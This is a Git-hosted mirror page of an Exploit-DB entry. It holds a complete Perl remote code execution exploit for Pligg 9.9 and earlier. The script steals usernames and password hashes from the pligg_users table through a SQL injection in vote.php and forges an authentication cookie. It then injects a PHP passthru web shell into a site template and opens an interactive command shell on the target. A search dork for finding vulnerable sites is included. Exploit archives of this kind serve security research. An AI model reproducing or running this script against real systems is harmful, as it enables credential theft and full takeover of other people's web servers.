bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/6172.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

204 lines
4.8 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl -w
use LWP::UserAgent;
use MIME::Base64;
use Digest::MD5 qw(md5_hex);
use Getopt::Std; getopts('h:', \%args);
print "#############################################\n";
print "# Pligg <= 9.9 Remote Code Execution Exploit \n";
print "#############################################\n";
#dork = "Powered By Pligg" + "Legal: License and Source"
# Proxy address
$ENV{http_proxy} = 'http://127.0.0.1:8118/';
my $http = LWP::UserAgent->new;
$http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
#$http->env_proxy(); # <-- uncomment for proxy
$http->cookie_jar({});
my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory
my $user = undef;
my $pass = undef;
my $file = undef;
my $data = undef;
my @auth = undef;
# Details for the php code that is injected in to the template
my $ereg = '<cmdout>(.*?)<\/cmdout>';
my $cvar = 'cmd';
my $cval = 'pwd;id';
my $code = '<cmdout><?php if ( !empty($_REQUEST["' . $cvar . '"]) ) passthru($_REQUEST["' . $cvar . '"]); ?></cmdout>';
print "[*] Checking if a shell already exists ...\n";
$data = $http->post(
$host . '/index.php',
[
$cvar => $cval
]);
if ( $data->content =~ /$ereg/si )
{
print "[*] Found existing shell ...\n";
}
else
{
print "[!] No existing shell found ...\n";
#############################################
# Gather user info via vote.php SQL Injection
#############################################
$data = $http->post(
$host . '/vote.php',
[
'id' => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*',
'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works
]);
print "[*] Gathering user information ...\n";
if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i )
{
$user = $1;
$pass = $2;
# Sets up the cookie to authenticate us
@auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';');
print "[+] Got user '$user' ...\n";
}
else
{
print "[!] Unable to get user info. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
exit;
}
#############################################
# Get the template path
#############################################
print "[*] Gathering template information ...\n";
$data = $http->get($host . '/admin_editor.php',@auth);
if ( $data->content =~ />(.*?)<\/option>/i )
{
$file = $1;
# Quick and dirty fix
$file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;
print "[+] Got template file [$file]...\n";
}
#############################################
# Read the template contents
#############################################
$data = $http->post(
$host . '/admin_editor.php',
[
'the_file' => $file,
'open' => 'Open'
]
,@auth);
print "[*] Reading template data ...\n";
# Grab the template contents
if ( $data->content =~ /<textarea(.*)>(.*)<\/textarea>/is )
{
$temp = $2;
$temp =~ s/&gt;/>/ig;
$temp =~ s/&lt;/</ig;
$temp =~ s/&quot;/"/ig;
$temp =~ s/&amp;/&/ig;
print "[+] Got template data ...\n";
}
else
{
print "[!] Unable to get template data. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
exit;
}
#############################################
# Update the Template Contents
#############################################
$data = $http->post(
$host . '/admin_editor.php',
[
'the_file2' => $file,
'updatedfile' => $temp . $code,
'save' => 'Save+Changes'
]
,@auth);
print "[*] Updating template data ...\n";
if ( $data->content =~ /File Saved/is )
{
print "[+] File saved!\n";
}
else
{
print "[!] Unable to update template data. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
exit;
}
}
#############################################
# Setting up the php shell
#############################################
print "[*] Setting up shell ...\n";
$data = $http->post(
$host . '/index.php',
[
$cvar => $cval
]);
if ( $data->content =~ /<cmdout>(.*?)<\/cmdout>/si )
{
while ( 1 )
{
print "pligg:~#";
$exec = <STDIN>;
$data = $http->post(
$host . '/index.php',
[
$cvar => $exec
]);
if ( $data->content =~ /$ereg/si )
{
print $1 . "\n";
}
else
{
print "Unexpected Response!\n";
}
}
}
else
{
print "[!] Unable to set up shell ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
exit;
}
sub usage
{
print "pligg_exploit.pl -h http://path/to/pligg \n";
exit;
}
# milw0rm.com [2008-07-30]
Reference in a new issue View git blame Copy permalink